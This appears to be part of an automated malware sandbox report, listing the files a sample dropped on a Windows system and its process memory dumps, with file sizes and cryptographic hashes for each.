2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

Download Submit
C:\Windows\Temp\nsa2008.tmp\nsExec.dll

Filesize
6KB

MD5
b648c78981c02c434d6a04d4422a6198

SHA1
74d99eed1eae76c7f43454c01cdb7030e5772fc2

SHA256
3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

SHA512
219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

Download Submit
C:\Windows\Temp\ppgkyibiq\btjlhtrlh.exe

Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\Temp\xohudmc.exe

Filesize
72KB

MD5
cbefa7108d0cf4186cdf3a82d6db80cd

SHA1
73aeaf73ddd694f99ccbcff13bd788bb77f223db

SHA256
7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

SHA512
b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

Download Submit
C:\Windows\ppgkyibiq\Corporate\vfshost.exe

Filesize
381KB

MD5
fd5efccde59e94eec8bb2735aa577b2b

SHA1
51aaa248dc819d37f8b8e3213c5bdafc321a8412

SHA256
441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

SHA512
74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

Download Submit
C:\Windows\ppgkyibiq\ihnqsqiep\Result.txt

Filesize
756B

MD5
7212ae6e39beb43addd499649a68617c

SHA1
c4e96030e0b869e2c428c3bcdfcad4bbc109c5e1

SHA256
c5c8ecc3c6c9a55e6e47f2e77ed728ea5cf7b60c48e0137209780b35dbdc7d36

SHA512
fb7de66105dda934d1d824b2b98e4decb0409e1a056480d77da2692fab013f7c81b9fd925d4ee894f7f4a39fc2e241c0ec7072d3da520d9b5378c04eafbd70a4

Download Submit
C:\Windows\ppgkyibiq\ihnqsqiep\Result.txt

Filesize
1KB

MD5
17c3aedf7c324560dbd923813647e53d

SHA1
1031026b90618f18611d730de1ff0ebcde309659

SHA256
86f063f4cd9d549fc5e540078348bf07c178e95df4c5786c9bcfccd08524b0ea

SHA512
8e9e55384b13dc07bf828dee241244fc36b28806cad3a12e33dcf6691a3cd4e659ac41c77d0f0ba4b4dcb3d5de310b1b5ffdca64ed018337b14537c78430df7c

Download Submit
C:\Windows\ppgkyibiq\ihnqsqiep\Result.txt

Filesize
1KB

MD5
6eec97d4907cea2638d382d33af57fe2

SHA1
6e1fd68ac6224dc983a8ed89907fd7bfb127c8c1

SHA256
1ee86e880bd58eb849e09e3a086d9f0496d370a5c5b40bb5a96a379a87f286ac

SHA512
d655aa8176872b80f30fa2513ee69e2b8fe57b0bfc1071163d0cb0a6947370f6f0e17db80ae8f70c94c435cfaad04d56c69f2c745f37b0b547ef11c5297f919e

Download Submit
C:\Windows\ppgkyibiq\ihnqsqiep\Result.txt

Filesize
1KB

MD5
814430787bd54c0ce4b67864cc369aa2

SHA1
f69ef818e8623e62d3c10e78378e1d1cc4a64099

SHA256
96b9dc394621d415c5decd0012ef72ae6de6c94aecb459957d1f3302d76dc820

SHA512
5eddb169cd9108194d71c7fc226f5c95bdb832583d27758330511fd8292f15ead04dbbbd6430f01a2c4b473682a787f2e2f131f9ca8fcd686f4e2ec9bea233ca

Download Submit
C:\Windows\ppgkyibiq\ihnqsqiep\Result.txt

Filesize
2KB

MD5
f4623f919e2f1c82b46bd8795d043823

SHA1
424c589053ace53be7744ff18e34e88e379a6429

SHA256
1f04f4c0014269f3dd598567d93b5e462c3a3a2c7e738dd0e957a78d55fe8172

SHA512
adb389cfea1be87491ca5fd6c8372234014667c24f0daa1046c369c285866d66fe3d9dc856fd1f01662d350e5990a74cbda5d9d2f7e2559a1e2aaf71a30c72f4

Download Submit
C:\Windows\ppgkyibiq\ihnqsqiep\Result.txt

Filesize
2KB

MD5
2b47d7411aef934e1d9e8068694a4106

SHA1
7391754ac142d75b9619b9af9b8acebc2a2b6edd

SHA256
5e267cdcdb266b6259c80f937fdee421e5e7df3e761cc319d5611d52e2fed3ad

SHA512
0ec35241230ef48e68662deeb0c758994ed070dc19274ac23f7b514d150ff8c99ecc6ce9ba0375fb8e59ec94dd4077be1e8499b45beaf98f116e208e1b5fba79

Download Submit
C:\Windows\ppgkyibiq\ihnqsqiep\Result.txt

Filesize
2KB

MD5
232bf520989d6c28c531d874bdb7df09

SHA1
d42d69e74233a9309cf18225377fdbc6c07b1052

SHA256
7f7a37b230b327f7592a4cf2f313ca3965b873fdc14c1725d9b89ca9d792d65d

SHA512
a6b25648222dc4f411efcb4f3123e8b344877221687bc491cda3ff734d85ab5143e7d921c590ca7483193c90df1a58960930907f51b2fe7d79aa685594ae11ed

Download Submit
C:\Windows\ppgkyibiq\ihnqsqiep\Result.txt

Filesize
3KB

MD5
9fa47d5f5ebeab1e9e57430ae92dc6df

SHA1
daf4ddb072c95dda7381e7311eeabd2928517f45

SHA256
12a9b0844a2ee739d60277954c64af175a222c5e308c3cbcc62c86693b0ffeb8

SHA512
04bcc978ff1084a133c0528f36728913ef9c90e425206ddd9c6986d6c5fd45e5aa1db56f880745ee6a7176b9904c10657a133a102b792003269e5688c8ba419b

Download Submit
C:\Windows\ppgkyibiq\ihnqsqiep\Result.txt

Filesize
3KB

MD5
198db17f8791cd72ad4d95bb0f02b63c

SHA1
7ecafd0654a59c8cbe25ccba2e8be010523a5952

SHA256
b73dbd742abb886ad9f136a55c43c78a94281221f4b5d63b0807edb96f0c1d0d

SHA512
0eca1988a6b93357f04a1fa2dc8f2bd01ac8ec07b05f76e2c92c0a7e9f448f9e4262366c4ae3847c5c561003a54083ec81c99f54966bd01ee7921bc66de56e61

Download Submit
C:\Windows\ppgkyibiq\ihnqsqiep\Result.txt

Filesize
3KB

MD5
c6a127a6c299936468278e7d4896f157

SHA1
21d205f6a0ee695e2e937774f79ac8eaa16c3522

SHA256
e0236021d1b6f3871a78535a8bb12a281698ea2a7f8ac643f769d72e2a47d66a

SHA512
414819085a36619e7551012d75a0cf4db6966f4065e11bbc4a213929e48d66c3e44926d968bad7e08b3192e0d3b3b29fab19af9a4672f26b31a3c6db828add21

Download Submit
C:\Windows\ppgkyibiq\ihnqsqiep\Result.txt

Filesize
3KB

MD5
0d1fde1ffb611ffb0c3da9b7465f0b50

SHA1
94550bc9aaabf5ca9253b0be2cff3f2ead3784ed

SHA256
caa4b991a524071cc365684471482b3c7c2d5d7e8ba6fc392e97743a1142d7c2

SHA512
4d8fc5056fb799b6151aab6c8022b463d84cd236345a7db2638a6a020f83d2cb97312273a02390af60535c10f7823dea9a723a956e96022fbdf889bdd202d039

Download Submit
C:\Windows\ppgkyibiq\ihnqsqiep\Result.txt

Filesize
4KB

MD5
13d648871c1da7284858a8a3cfbdfef7

SHA1
5692d8407f32f0c30f9d14357bfd1824b2cf3a5f

SHA256
107e11dd0cb17c2d2a095415e5f990a1e777bb8b450a14921e3aa9f269fdd451

SHA512
c37219defbbb8ad94c246d5ccee61a153ea2d7d4f987c880b6c8734e8a20aac118574f9c3516d11084273472cb0379024c6f2e6848f1fda8d68dda008cafdf7d

Download Submit
C:\Windows\ppgkyibiq\ihnqsqiep\bjfisnrbq.exe

Filesize
332KB

MD5
ea774c81fe7b5d9708caa278cf3f3c68

SHA1
fc09f3b838289271a0e744412f5f6f3d9cf26cee

SHA256
4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

SHA512
7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

Download Submit
C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exe

Filesize
424KB

MD5
e9c001647c67e12666f27f9984778ad6

SHA1
51961af0a52a2cc3ff2c4149f8d7011490051977

SHA256
7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

SHA512
56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
1KB

MD5
c838e174298c403c2bbdf3cb4bdbb597

SHA1
70eeb7dfad9488f14351415800e67454e2b4b95b

SHA256
1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53

SHA512
c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376

Download Submit
C:\Windows\tllefmnq\yittybr.exe

Filesize
17.6MB

MD5
c0fa7e44c7f8b52eba16c650b74d563a

SHA1
11f29828d7b19df6967f0c0b55fb34eb0d0e1a14

SHA256
36afb1c530eaa5ad0c9e8351ad20912cd85e7c681e4b8b26249642c54984c527

SHA512
ef4122b5c92bf5ccb2eb475aa62554847ff813774a931ccf33a286ccc969edc2511f7ce5225155f36df53caf6612df5309dfd679f9ba93adfd4e32e39e3ee5e9

Download Submit
memory/216-198-0x00007FF696A90000-0x00007FF696AEB000-memory.dmp

Filesize
364KB

Download
memory/512-216-0x00007FF696A90000-0x00007FF696AEB000-memory.dmp

Filesize
364KB

Download
memory/1112-176-0x00007FF696A90000-0x00007FF696AEB000-memory.dmp

Filesize
364KB

Download
memory/1248-78-0x00000000013C0000-0x000000000140C000-memory.dmp

Filesize
304KB

Download
memory/1252-8-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/1468-194-0x00007FF696A90000-0x00007FF696AEB000-memory.dmp

Filesize
364KB

Download
memory/1708-232-0x00007FF696A90000-0x00007FF696AEB000-memory.dmp

Filesize
364KB

Download
memory/1732-181-0x00007FF696A90000-0x00007FF696AEB000-memory.dmp

Filesize
364KB

Download
memory/2284-186-0x00007FF696A90000-0x00007FF696AEB000-memory.dmp

Filesize
364KB

Download
memory/2484-225-0x00007FF696A90000-0x00007FF696AEB000-memory.dmp

Filesize
364KB

Download
memory/3156-211-0x00007FF696A90000-0x00007FF696AEB000-memory.dmp

Filesize
364KB

Download
memory/3232-4-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/3232-0-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/3404-146-0x00007FF696A90000-0x00007FF696AEB000-memory.dmp

Filesize
364KB

Download
memory/3404-142-0x00007FF696A90000-0x00007FF696AEB000-memory.dmp

Filesize
364KB

Download
memory/3572-237-0x00007FF696A90000-0x00007FF696AEB000-memory.dmp

Filesize
364KB

Download
memory/3672-222-0x00007FF6B7290000-0x00007FF6B73B0000-memory.dmp

Filesize
1.1MB

Download
memory/3672-178-0x00007FF6B7290000-0x00007FF6B73B0000-memory.dmp

Filesize
1.1MB

Download
memory/3672-167-0x0000018307700000-0x0000018307710000-memory.dmp

Filesize
64KB

Download
memory/3672-233-0x00007FF6B7290000-0x00007FF6B73B0000-memory.dmp

Filesize
1.1MB

Download
memory/3672-527-0x00007FF6B7290000-0x00007FF6B73B0000-memory.dmp

Filesize
1.1MB

Download
memory/3672-164-0x00007FF6B7290000-0x00007FF6B73B0000-memory.dmp

Filesize
1.1MB

Download
memory/3672-499-0x00007FF6B7290000-0x00007FF6B73B0000-memory.dmp

Filesize
1.1MB

Download
memory/3672-248-0x00007FF6B7290000-0x00007FF6B73B0000-memory.dmp

Filesize
1.1MB

Download
memory/3672-497-0x00007FF6B7290000-0x00007FF6B73B0000-memory.dmp

Filesize
1.1MB

Download
memory/3672-214-0x00007FF6B7290000-0x00007FF6B73B0000-memory.dmp

Filesize
1.1MB

Download
memory/3672-183-0x00007FF6B7290000-0x00007FF6B73B0000-memory.dmp

Filesize
1.1MB

Download
memory/3672-201-0x00007FF6B7290000-0x00007FF6B73B0000-memory.dmp

Filesize
1.1MB

Download
memory/3824-207-0x00007FF696A90000-0x00007FF696AEB000-memory.dmp

Filesize
364KB

Download
memory/3972-135-0x00007FF6E22C0000-0x00007FF6E23AE000-memory.dmp

Filesize
952KB

Download
memory/3972-138-0x00007FF6E22C0000-0x00007FF6E23AE000-memory.dmp

Filesize
952KB

Download
memory/4168-220-0x00007FF696A90000-0x00007FF696AEB000-memory.dmp

Filesize
364KB

Download
memory/4476-152-0x0000000010000000-0x0000000010008000-memory.dmp

Filesize
32KB

Download
memory/4476-169-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/4900-203-0x00007FF696A90000-0x00007FF696AEB000-memory.dmp

Filesize
364KB

Download
memory/4928-247-0x0000000000220000-0x0000000000232000-memory.dmp

Filesize
72KB

Download
memory/4932-172-0x00007FF696A90000-0x00007FF696AEB000-memory.dmp

Filesize
364KB

Download
memory/4960-229-0x00007FF696A90000-0x00007FF696AEB000-memory.dmp

Filesize
364KB

Download
memory/5100-235-0x00007FF696A90000-0x00007FF696AEB000-memory.dmp

Filesize
364KB

Download